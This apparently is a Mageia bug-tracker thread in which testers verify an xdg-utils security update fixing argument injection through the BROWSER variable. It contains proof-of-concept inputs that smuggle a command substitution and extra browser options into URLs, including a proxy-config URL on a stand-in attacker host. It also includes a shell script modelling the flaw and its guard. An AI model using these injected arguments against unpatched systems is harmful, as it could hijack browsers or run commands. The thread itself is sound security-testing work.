Fedora has issued an advisory on May 17:
The issue is fixed upstream in 1.1.3.
Mageia 5 is also affected.
The Red Hat bug has links to the upstream commit that fixes it and to the bug report:
Note that they followed up with a regression fix on May 30:
Pushed xdg-utils-1.1.3-1 to mga6 core/updates_testing.
Updated xdg-utils package fixes security vulnerability:
The open_envvar function in xdg-open in xdg-utils before 1.1.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by %s in this environment variable.
Updated packages in core/updates_testing:
MGA6-32 on IBM Thinkpad R50e MATE
No installation issues.
Ref to bug 14932 Comment 16
Giving this command at CLI
$ xdg-open 'http://127.0.0.1/$(xterm)'
results in a new tab in Firefox with "error 404"
$ xdg-open 'http://127.0.0.1/$%(xterm)'
as in the same comment results in error 400
I let people with more understanding judge this issue.
$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --incognito"
This shows a yellow page with a report of an XML error.
'http://www.example.com/%20--incognito' in the address bar.
Not possible to say whether this page is being opened at the given URL or locally.
$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.com/proxy.pac"
The behaviour is the same for the first example above, so, in agreement with Herman, I shall leave the interpretation to others. The older PoC gave the same results as in comment 4.
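An added example, not taken from the bug report or from xdg-utils itself: a minimal model of why the URLs tried in the comments above turn into extra browser arguments when a BROWSER template containing %s is expanded unquoted, next to a single-word guard of the kind the 1.1.3 fix applies (my own reconstruction, not the upstream script). fake_browser, launch_unchecked and launch_checked are names I chose.

```shell
#!/bin/sh
# Stand-in for the real browser: prints how many arguments it received,
# so the caller can see whether the URL was split into several words.
fake_browser() {
    echo "$#"
}

# Vulnerable pattern (pre-1.1.3 behaviour, modelled): the %s template is
# expanded with printf and the result is left unquoted, so the shell
# word-splits the URL. A URL such as "http://www.example.com/ --incognito"
# therefore reaches the browser as two arguments, the second one an option.
launch_unchecked() {
    # $1 = BROWSER template, $2 = URL (the unquoted expansion is the bug)
    $(printf "$1" "$2")
}

# Guard: true only if its argument list has exactly one element. Calling
# it with the URL unquoted lets the shell word-split it first, so a URL
# containing whitespace yields several arguments and the check fails.
has_single_argument() {
    test $# = 1
}

# Hardened pattern: refuse any URL that would not survive as one word.
# Note that "http://127.0.0.1/$(xterm)" is still a single word; the result
# of printf is only word-split, never evaluated a second time, so it is
# passed on literally (hence the plain 404 seen in the comment above).
launch_checked() {
    if has_single_argument $2; then
        $(printf "$1" "$2")
    else
        echo "refused: URL would expand to more than one argument" >&2
        return 1
    fi
}

# Demo with constructed inputs based on the URLs used in the testing above.
for url in 'http://exoplanet.eu' 'http://www.example.com/ --incognito'; do
    printf 'unchecked: %s -> %s argument(s)\n' "$url" \
        "$(launch_unchecked 'fake_browser %s' "$url")"
    if launch_checked 'fake_browser %s' "$url" >/dev/null 2>&1; then
        echo "checked:   $url -> accepted"
    else
        echo "checked:   $url -> refused"
    fi
done
```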
Utilities available: man or --help for more information.
* xdg-desktop-icon Install icons to the desktop
* xdg-desktop-menu Install desktop menu items
* xdg-email Send mail using the user's preferred e-mail composer
* xdg-icon-resource Install icon resources
* xdg-mime Query information about file type handling and install descriptions for new file types
* xdg-open Open a file or URL in the user's preferred application
* xdg-screensaver Control the screensaver
* xdg-settings Get various settings from the desktop environment
$ xdg-email --cc email@example.com --subject "xdg-utils testing" --body "Can you hear me Muther
> I say, can you hear me Muther?" <...@....>.com
This popped up a mail composer window in thunderbird with the specified fields filled in, message ready to be sent.
Fiddled with the desktop and icon install stuff but got nowhere with those.
$ xdg-open http://exoplanet.eu
No problem with that.
$ xdg-settings get default-web-browser
Installed iceape but did no configuration.
$ BROWSER=/usr/bin/iceape xdg-open http://exoplanet.eu
The site came up OK in iceape but there were backend errors reported and entreaties to run mozplugger-update. Ignored those.
This package obviously requires more background knowledge for effective operation but on the face of it seems to be working.
An update for this issue has been pushed to the Mageia Updates repository.